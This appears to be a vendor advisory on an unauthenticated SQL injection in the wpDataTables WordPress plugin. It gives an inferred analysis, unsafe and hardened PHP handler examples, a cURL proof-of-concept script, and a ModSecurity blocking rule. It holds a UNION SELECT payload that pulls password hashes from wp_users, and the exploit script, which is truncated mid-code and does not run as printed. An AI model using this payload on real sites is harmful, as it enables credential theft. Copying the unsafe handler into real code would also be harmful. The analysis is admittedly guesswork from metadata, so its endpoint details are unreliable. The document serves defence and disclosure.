Published: June 28, 2026

CVE-2026-54825: wpDataTables (Premium) <= 7.4 Unauthenticated SQL Injection PoC, Patch Analysis & Rule

Plugin: wpdatatables
Severity: High (CVSS 7.5)
CWE: 89
Vulnerable Version: 7.4
Patched Version:
Disclosed: June 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-54825 (metadata-based):

This vulnerability is an unauthenticated SQL injection in the wpDataTables Premium plugin for WordPress, affecting versions up to and including 7.4. It carries a CVSS score of 7.5 (High) with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. The attacker needs no authentication and can execute arbitrary SQL queries against the database.

The root cause, as indicated by the CWE-89 classification and the description, is a failure to properly escape user-supplied parameters and insufficient preparation of existing SQL queries. This is a classic second-order or inline SQL injection where the plugin interpolates attacker-controlled input directly into an SQL statement without using prepared statements or parameterized queries (e.g., $wpdb->prepare). Since no code diff is available, Atomic Edge analysis infers that the vulnerable parameter is likely passed via a shortcode attribute, AJAX handler, or REST API endpoint controlled by the plugin. The lack of nonce verification or capability checks likely allows unauthenticated access to the vulnerable function.

Exploitation would involve sending a crafted HTTP request to the plugin's public-facing endpoint. WordPress plugins commonly expose AJAX actions under the 'wpdatatables' slug. Based on the plugin's functionality, the likely attack vector is an AJAX action such as 'wpdatatables_get_table_data' or 'wpdatatables_load_table' that accepts a table ID or query parameter. The attacker would inject SQL via a parameter like 'id', 'table_id', or 'query'. A typical payload would be: action=wpdatatables_load_table&table_id=1 UNION SELECT user_pass FROM wp_users-- .
No authentication is required because the handler does not enforce current_user_can().

Remediation requires the plugin developers to (1) use $wpdb->prepare() or similar parameterized queries for all SQL statements, (2) escape user-supplied input with esc_sql() as a secondary defense, and (3) implement proper authorization checks (e.g., current_user_can('edit_posts')) on AJAX handlers. The patched version 7.4.1 likely addresses these issues by converting raw SQL interpolations to parameterized queries.

Impact includes complete database disclosure. An unauthenticated attacker can extract all WordPress user credentials (hashed passwords), posts, options, and other sensitive data from the database. This can lead to privilege escalation if admin hashes are cracked, or to further attacks such as lateral movement through exposed internal data. The confidentiality impact is rated HIGH, while integrity and availability are not directly affected.
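As an added illustration of the three remediation steps above (example code, not the plugin's own, whose source is not available here), the following hypothetical admin-ajax.php handler shows the unsafe interpolation pattern the analysis describes next to a hardened version. The action and parameter names are the ones the analysis infers; the table name, the 'wdt_nonce' action and the 'order' parameter are assumptions.

```php
<?php
// Added example, not wpDataTables code: a hypothetical handler for the inferred
// 'wpdatatables_load_table' AJAX action, first as the unsafe pattern, then hardened.
// The table name {$wpdb->prefix}wpdatatables is an assumption.

// UNSAFE: the *_nopriv hook serves unauthenticated callers, and table_id is
// interpolated verbatim, so "1 UNION SELECT user_pass FROM wp_users-- " runs as SQL.
add_action( 'wp_ajax_nopriv_wpdatatables_load_table', 'wdt_load_table_unsafe' );
function wdt_load_table_unsafe() {
    global $wpdb;
    $table_id = $_POST['table_id'];   // attacker-controlled string, no validation
    $rows = $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}wpdatatables WHERE id = $table_id"
    );
    wp_send_json_success( $rows );
}

// HARDENED: authenticated users only, nonce-checked, capability-checked, and every
// value bound through $wpdb->prepare() (remediation steps 1 and 3 from the analysis).
add_action( 'wp_ajax_wpdatatables_load_table', 'wdt_load_table_safe' );  // no *_nopriv hook
function wdt_load_table_safe() {
    global $wpdb;

    // Step 3: CSRF nonce ('wdt_nonce' is an assumed action name) plus a capability check.
    check_ajax_referer( 'wdt_nonce', 'nonce' );
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Step 1: absint() reduces the input to a non-negative integer and %d binds it,
    // so no SQL metacharacter can reach the query regardless of what was posted.
    $table_id = absint( $_POST['table_id'] ?? 0 );

    // Identifiers cannot be bound by prepare(), so a sort column must be allow-listed
    // rather than escaped; esc_sql() (step 2) is only a fallback for string values that,
    // for some reason, cannot go through prepare(), never a substitute for it.
    $allowed_cols = array( 'id', 'title' );
    $order_col    = sanitize_key( $_POST['order'] ?? 'id' );
    if ( ! in_array( $order_col, $allowed_cols, true ) ) {
        $order_col = 'id';
    }

    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}wpdatatables WHERE id = %d ORDER BY {$order_col}",
            $table_id
        )
    );
    wp_send_json_success( $rows );
}
```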
Proof of Concept (PHP)

The PoC as published; the portion between "(Premium)" and the request array was lost in extraction, so $ajax_url, $sql_payload and $post_data are not defined in what survives.

```php
<?php
// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2026-54825 – wpDataTables (Premium) 'wpdatatables_load_table',
    'table_id' => $sql_payload,
    'wdt_var1' => '1',
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo '[!] cURL error: ' . curl_error($ch) . PHP_EOL;
    exit(1);
}

curl_close($ch);

// Output response
if ($http_code === 200) {
    echo '[+] Request succeeded (HTTP 200). Response body follows:' . PHP_EOL;
    echo $response . PHP_EOL;

    // Check if SQL injection likely worked by looking for user data patterns
    if (preg_match('/[a-f0-9]{32}/i', $response)) {
        echo '[+] Likely SQL injection successful: extracted MD5-like hashes found.' . PHP_EOL;
    } elseif (preg_match('/\$P\$[A-Za-z0-9]{30,}/', $response)) {
        echo '[+] Likely SQL injection successful: extracted phpass hashes found.' . PHP_EOL;
    }
} else {
    echo '[-] Request failed with HTTP code ' . $http_code . PHP_EOL;
}
?>
```
ModSecurity Rule

```apache
# Atomic Edge WAF Rule – CVE-2026-54825 (metadata-based)
# Blocks unauthenticated SQL injection via wpDataTables AJAX handler
# This rule targets the inferred vulnerable endpoint: admin-ajax.php with action=wpdatatables_load_table
# SQL injection pattern matches UNION SELECT, stacked DML/DDL and time-based (sleep/benchmark) probes
# Note: REQUEST_FILENAME is used rather than REQUEST_URI, because REQUEST_URI carries the query
# string and an exact @streq match would never fire on admin-ajax.php?... requests; @endsWith also
# covers WordPress installed under a sub-path.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
    "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-54825 – wpDataTables SQL Injection via AJAX',severity:'CRITICAL',tag:'CVE-2026-54825',tag:'wordpress',tag:'wpdatatables'"
    SecRule ARGS_POST:action "@streq wpdatatables_load_table" "chain"
        SecRule ARGS_POST:table_id "@rx (?i)(union.*select|select.*from|insert.*into|update.*set|delete.*from|drop.*table|sleep\(|benchmark\()"
```

The chain only reaches the third rule when the first two match, so a legitimate numeric table_id never hits the deny; for tighter coverage of an integer-only parameter, a negative match such as `"!@rx ^\d+$"` on ARGS_POST:table_id is a stricter alternative to the pattern list.
